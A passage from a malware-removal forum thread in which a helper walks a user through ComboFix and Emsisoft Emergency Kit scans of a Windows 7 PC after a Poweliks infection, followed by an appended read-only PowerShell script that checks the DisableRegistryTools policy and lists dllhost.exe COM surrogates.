c:\users\FD-2\AppData\Roaming\3713821378
c:\users\FD-2\AppData\Roaming\3878295211
c:\users\FD-2\AppData\Roaming\502041251
c:\users\FD-2\g2ax_customer_downloadhelper_win32_x86.exe
c:\users\FD-2\g2ax_expert_downloadhelper_win32_x86.exe
c:\users\FD-2\GoToAssistDownloadHelper.exe
c:\windows\wininit.ini
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
    (Default)    REG_SZ    Thumbnail Cache Class Factory for Out of Proc Server
    AppID    REG_SZ    {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
    (Default)    REG_SZ    c:\windows\system32\thumbcache.dll
    ThreadingModel    REG_SZ    Apartment
.
.
(((((((((((((((((((((((((   Files Created from 2014-08-01 to 2014-09-01  )))))))))))))))))))))))))))))))
.
.
2014-09-01 18:24 . 2014-09-01 18:24    --------    d-----w-    c:\users\Default\AppData\Local\temp
2014-09-01 18:21 . 2014-09-01 18:21    75888    ----a-w-    c:\programdata\Microsoft\Windows Defender\Definition Updates\{0E6F2357-A916-4F97-87AE-A7F3DC35357F}\offreg.dll
2014-09-01 05:07 . 2014-09-01 05:07    --------    d-----w-    c:\users\FD-2\AppData\Roaming\KSafe
2014-09-01 05:07 . 2014-09-01 05:07    --------    d-----w-    c:\programdata\KSafe
2014-09-01 05:06 . 2014-09-01 05:06    --------    d-----w-    c:\program files (x86)\DllTool
2014-09-01 04:55 . 2014-09-01 12:41    --------    d-----w-    C:\FRST
2014-08-29 19:54 . 2014-08-21 03:43    11319192    ----a-w-    c:\programdata\Microsoft\Windows Defender\Definition Updates\{0E6F2357-A916-4F97-87AE-A7F3DC35357F}\mpengine.dll
2014-08-28 03:55 . 2014-08-23 02:07    404480    ----a-w-    c:\windows\system32\gdi32.dll
2014-08-28 03:55 . 2014-08-23 01:45    311808    ----a-w-    c:\windows\SysWow64\gdi32.dll
2014-08-28 03:55 . 2014-08-23 00:59    3163648    ----a-w-    c:\windows\system32\win32k.sys
2014-08-27 05:15 . 2014-08-27 05:15    --------    d--h--w-    c:\programdata\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-16 07:00 . 2014-06-30 22:24    8856    ----a-w-    c:\windows\system32\icardres.dll
2014-08-16 07:00 . 2014-06-30 22:14    8856    ----a-w-    c:\windows\SysWow64\icardres.dll
2014-08-16 07:00 . 2014-03-09 21:48    171160    ----a-w-    c:\windows\system32\infocardapi.dll
2014-08-16 07:00 . 2014-03-09 21:48    1389208    ----a-w-    c:\windows\system32\icardagt.exe
2014-08-16 07:00 . 2014-03-09 21:47    99480    ----a-w-    c:\windows\SysWow64\infocardapi.dll
2014-08-16 07:00 . 2014-03-09 21:47    619672    ----a-w-    c:\windows\SysWow64\icardagt.exe
2014-08-16 07:00 . 2014-06-06 06:16    35480    ----a-w-    c:\windows\SysWow64\TsWpfWrp.exe
2014-08-16 07:00 . 2014-06-06 06:12    35480    ----a-w-    c:\windows\system32\TsWpfWrp.exe
2014-08-08 17:46 . 2014-08-08 17:46    --------    d-----w-    c:\users\FD-2\AppData\Roaming\98a319
2014-08-08 17:46 . 2014-08-08 22:23    --------    d-----w-    c:\users\FD-2\AppData\Local\98a319
2014-08-08 17:46 . 2014-08-08 17:47    --------    d-----w-    c:\users\FD-2\AppData\Local\browser_dir
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-01 05:28 . 2010-06-24 16:33    23256    ----a-w-    c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-16 07:07 . 2014-01-22 10:52    99218768    ----a-w-    c:\windows\system32\MRT.exe
2014-08-05 13:20 . 2010-11-21 03:27    270496    ------w-    c:\windows\system32\MpSigStub.exe
2014-07-31 15:08 . 2014-07-31 15:08    169544    ----a-w-    c:\windows\system32\g2ax_credential_provider64_715.dll
2014-06-18 02:18 . 2014-07-10 06:32    692736    ----a-w-    c:\windows\system32\osk.exe
2014-06-18 01:51 . 2014-07-10 06:32    646144    ----a-w-    c:\windows\SysWow64\osk.exe
2014-06-06 10:10 . 2014-07-10 06:32    624128    ----a-w-    c:\windows\system32\qedit.dll
2014-06-06 09:44 . 2014-07-10 06:32    509440    ----a-w-    c:\windows\SysWow64\qedit.dll
2014-06-05 14:45 . 2014-07-10 06:32    1460736    ----a-w-    c:\windows\system32\lsasrv.dll
2014-06-05 14:26 . 2014-07-10 06:32    22016    ----a-w-    c:\windows\SysWow64\secur32.dll
2014-06-05 14:25 . 2014-07-10 06:32    96768    ----a-w-    c:\windows\SysWow64\sspicli.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 89184]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Conversion to PDF with ScanSnap Organizer.lnk - c:\program files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe [2014-7-31 24576]
Intuit Data Protect.lnk - c:\program files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe /Startup [2014-6-26 6306104]
QuickBooks_Standard_21.lnk - c:\program files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE -silent [2014-6-26 1215816]
ScanSnap Manager.lnk - c:\program files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe [2013-8-19 1163264]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
R2 CLKMSVC10_9EC60124;CyberLink Product - 2013/08/12 10:54;c:\program files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe;c:\program files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 EtronHub3;Etron USB 3.0 Extensible Hub Driver;c:\windows\System32\Drivers\EtronHub3.sys;c:\windows\SYSNATIVE\Drivers\EtronHub3.sys [x]
R3 EtronSTOR;Etron Enhance USB BOT/UASP Mass Storage Driver;c:\windows\System32\Drivers\EtronSTOR.sys;c:\windows\SYSNATIVE\Drivers\EtronSTOR.sys [x]
R3 EtronXHCI;Etron USB 3.0 Extensible Host Controller Driver;c:\windows\System32\Drivers\EtronXHCI.sys;c:\windows\SYSNATIVE\Drivers\EtronXHCI.sys [x]
R3 icvmlt32;icvmlt32;c:\icverify\ICWin420\PCVXWinServiceManager.exe icvmlt32;c:\icverify\ICWin420\PCVXWinServiceManager.exe icvmlt32 [x]
R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB12OEM;RoxMediaDB12OEM;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe [x]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
R3 SNXPPAMD;SUNIX Parallel Port Driver;c:\windows\system32\drivers\snxppamd.sys;c:\windows\SYSNATIVE\drivers\snxppamd.sys [x]
R3 SNXPSAMD;SUNIX Serial Port Driver;c:\windows\system32\drivers\snxpsamd.sys;c:\windows\SYSNATIVE\drivers\snxpsamd.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S1 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys;c:\windows\SYSNATIVE\DRIVERS\eamonm.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys;c:\windows\SYSNATIVE\DRIVERS\ehdrv.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 epfwwfpr;epfwwfpr;c:\windows\system32\DRIVERS\epfwwfpr.sys;c:\windows\SYSNATIVE\DRIVERS\epfwwfpr.sys [x]
S2 GoToAssist Remote Support Customer;GoToAssist Remote Support Customer;c:\program files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe Start=service;c:\program files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe Start=service [x]
S2 ICVTnsServer;ICVTnsServer;c:\icverify\ICWin420\PCVXWinServiceManager.exe ICVTnsServer;c:\icverify\ICWin420\PCVXWinServiceManager.exe ICVTnsServer [x]
S2 JCard Service;JCard Service;c:\icverify\ICWin420\Jcard\JCardService.exe;c:\icverify\ICWin420\Jcard\JCardService.exe [x]
S2 PCVXFileMonitor;PCVXFileMonitor;c:\icverify\ICWin420\PCVXWinServiceManager.exe PCVXFileMonitor;c:\icverify\ICWin420\PCVXWinServiceManager.exe PCVXFileMonitor [x]
S2 QBVSS;QBIDPService;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [x]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 PaniniUSB;PaniniUSB;c:\windows\system32\DRIVERS\PaniniUSB.sys;c:\windows\SYSNATIVE\DRIVERS\PaniniUSB.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*Deregistered* - CLKMDRV10_9EC60124
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-08-15 00:35    1104200    ----a-w-    c:\program files (x86)\Google\Chrome\Application\36.0.1985.143\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-01 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27 20:03]
.
2014-09-01 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27 20:03]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-04-25 170264]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-04-25 398616]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-04-25 439064]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2013-03-21 6330568]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = https://www.google.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: agentnet.com
Trusted Zone: amadeus.com
Trusted Zone: amadeus.com\content
Trusted Zone: amadeus.com\diagnostic
Trusted Zone: amadeus.net
Trusted Zone: amadeuscruise.com
Trusted Zone: amadeusferry.com\*
Trusted Zone: amadeusproweb.com
Trusted Zone: amadeusvista.com
Trusted Zone: amadeusvista.com\*.1a
Trusted Zone: amadeusvista.com\certificates
Trusted Zone: chase.com
Trusted Zone: 128.110\50.192
Trusted Zone: 228.193\50.243
Trusted Zone: amadeus.com\content
Trusted Zone: amadeus.net\content.1a
Trusted Zone: amadeusproweb.com
Trusted Zone: amadeusvista.com
Trusted Zone: amadeusvista.com\Muc.http.farm6.software
Trusted Zone: amadeusvista.com\Muc.http.farm8.software
Trusted Zone: amadeusvista.com\Muc.https.farm11.software
Trusted Zone: amadeusvista.com\Muc.https.farm5.software
TCP: DhcpNameServer = 208.67.222.222 208.67.220.220 4.2.2.2
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} - hxxp://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} - hxxp://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} - hxxp://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} - hxxp://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
FF - ProfilePath - c:\users\FD-2\AppData\Roaming\Mozilla\Firefox\Profiles\31sv5obh.default\
FF - prefs.js: browser.startup.homepage - hxxp://google.com/
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
Toolbar-Locked - (no file)
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_8_800_94_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_8_800_94_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_8_800_94_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_8_800_94_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B9A09F18-45AB-4F09-A117-A4ADDA8FA8C8}]
@Denied: (A) (Everyone)
"Solution"="{36eb6792-3a29-43b3-8cd0-f67d266fb426}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane\0]
"Key"="ActionsPane"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\8.0\\ActionsPane.xsd"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-01  14:25:34
ComboFix-quarantined-files.txt  2014-09-01 18:25
.
Pre-Run: 411,490,344,960 bytes free
Post-Run: 420,221,435,904 bytes free
.
- - End Of File - - 2C527EAA0D863A40358FD0BE0FBA23EF
A36C5E4F47E84449FF07ED3517B43A31
 



#10 aharonov
  • Malware Response Team
  • 2,441 posts
  • Gender:Male

Posted 01 September 2014 - 02:04 PM

There are no miracles in malware removal... :)

The following step should be done on both computers:


Download Emsisoft Emergency Kit and save it to your desktop. Double click on EmsisoftEmergencyKit.exe to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click Accept & Extract. A folder named EEK will be created in the root of the drive (usually c:\).
  • After extraction an Emsisoft Emergency Kit window will open. Under "Run Directly:" click Emergency Kit Scanner.
  • When asked to run an online update, click Yes.
  • When the update is finished, click the Back to Security Status link in the left corner. On the main screen click the Scan Now button.
  • Select the Full Scan option and click the SCAN button.
  • When the scan is finished click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • Click the View Report button and in the Reports window double-click on the most recent log. Note, logs are named as follows: a2scan_<date>-<time>.txt.
  • Copy/paste the report contents in your next reply.


#11 litepc
  • Topic Starter
  • Members
  • 12 posts

Posted 01 September 2014 - 02:48 PM

Ok: Should I quarantine even the ones that it notes NO RISK?



#12 aharonov
  • Malware Response Team
  • 2,441 posts
  • Gender:Male

Posted 01 September 2014 - 02:50 PM

In fact it would be better to quarantine none of the found threats and just post the log.

#13 litepc
  • Topic Starter
  • Members
  • 12 posts

Posted 01 September 2014 - 02:53 PM

OK... so I assume it will create a log even if I don't quarantine, correct?

Doing it now on both desktops.



#14 aharonov
  • Malware Response Team
  • 2,441 posts
  • Gender:Male

Posted 01 September 2014 - 03:02 PM

Yes, just skip the point with "Quarantine selected objects" in my instructions.

#15 litepc
  • Topic Starter
  • Members
  • 12 posts

Posted 01 September 2014 - 03:05 PM

OK, here is the EEK log file for PC #1

 

Emsisoft Emergency Kit - Version 9.0
Last update: 9/1/2014 3:33:17 PM
User account: SFTFD-2\FD-2

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start:    9/1/2014 3:33:50 PM
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS     detected: Setting.DisableRegistryTools (A)

Scanned    202894
Found    1

Scan end:    9/1/2014 4:03:25 PM
Scan time:    0:29:35
 
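A triage script for the two things this thread surfaces: the DisableRegistryTools policy value that EEK flagged in the log above, and the many dllhost.exe *32 instances the topic is about. This is an added example and is not part of the thread, of EEK or of ComboFix. It assumes an elevated Windows PowerShell session (2.0 or later, which is what Windows 7 SP1 ships) on the affected PC; the function names Get-RegistryToolsPolicy and Get-DllHostSurrogates are chosen here for illustration.

```powershell
# Added example, not from the thread, EEK or ComboFix. Run elevated on the affected PC.
# Uses Get-WmiObject and New-Object so it also works on the PowerShell 2.0 that ships with Windows 7.

function Get-RegistryToolsPolicy {
    # The value EEK reported: HKLM\...\Policies\System -> DisableRegistryTools
    $key  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $item = Get-ItemProperty -Path $key -Name 'DisableRegistryTools' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return "DisableRegistryTools: not set under $key" }
    # A non-zero value blocks regedit for the user. A domain GPO can set this legitimately;
    # on a standalone PC with no such policy it is worth treating as suspect.
    return "DisableRegistryTools: $($item.DisableRegistryTools) under $key"
}

function Get-DllHostSurrogates {
    # dllhost.exe is the COM surrogate and is started as:  dllhost.exe /Processid:{GUID}
    # The GUID is an AppID; in most registrations the same GUID is also the CLSID of the hosted object,
    # so both AppID\{GUID} and CLSID\{GUID}\InprocServer32 are looked up to name the hosted DLL.
    Get-WmiObject Win32_Process -Filter "Name = 'dllhost.exe'" | ForEach-Object {
        $proc  = $_
        $is32  = $proc.ExecutablePath -like '*\SysWOW64\*'   # the "*32" instances in Task Manager
        $guid  = $null
        if ($proc.CommandLine -match '/Processid:\s*(\{[0-9A-Fa-f-]+\})') { $guid = $Matches[1] }

        $appIdName = $null; $server = $null; $sig = $null
        if ($guid) {
            # A 32-bit surrogate resolves its classes through the Wow6432Node view of HKLM\SOFTWARE\Classes.
            $classes = 'HKLM:\SOFTWARE\Classes'
            if ($is32) { $classes = 'HKLM:\SOFTWARE\Classes\Wow6432Node' }

            $appKey = Join-Path $classes "AppID\$guid"
            if (Test-Path $appKey) { $appIdName = (Get-ItemProperty -Path $appKey).'(default)' }

            $srvKey = Join-Path $classes "CLSID\$guid\InprocServer32"
            if (Test-Path $srvKey) { $server = (Get-ItemProperty -Path $srvKey).'(default)' }
        }
        if ($server) {
            # Verify the Authenticode signature of the DLL actually being hosted.
            $path = [Environment]::ExpandEnvironmentVariables($server)
            if (Test-Path $path) { $sig = (Get-AuthenticodeSignature -FilePath $path).Status }
        }

        $parent = Get-Process -Id $proc.ParentProcessId -ErrorAction SilentlyContinue
        $parentName = '(exited)'
        if ($parent) { $parentName = $parent.ProcessName }

        New-Object PSObject -Property @{
            Pid       = $proc.ProcessId
            Is32Bit   = $is32
            Parent    = "$parentName ($($proc.ParentProcessId))"
            Started   = $proc.ConvertToDateTime($proc.CreationDate)
            AppId     = $guid
            AppIdName = $appIdName
            Server    = $server
            ServerSig = $sig
        }
    }
}

Get-RegistryToolsPolicy
Get-DllHostSurrogates | Format-Table Pid, Is32Bit, Parent, Started, AppId, AppIdName, Server, ServerSig -AutoSize
```

What to look for in the output: COM surrogates are launched by the DcomLaunch service, so the parent of a legitimate dllhost.exe is normally svchost.exe; a dllhost.exe whose parent is something else, whose command line carries no /Processid: argument, or whose hosted Server DLL sits outside C:\Windows with a ServerSig of NotSigned deserves a closer look. The listing is a snapshot, so run it while the many *32 instances are visible; surrogates that exit quickly will not appear. The policy check only says whether the value is present, not who set it, which is why the helper (who sees the full logs) should decide what to remove.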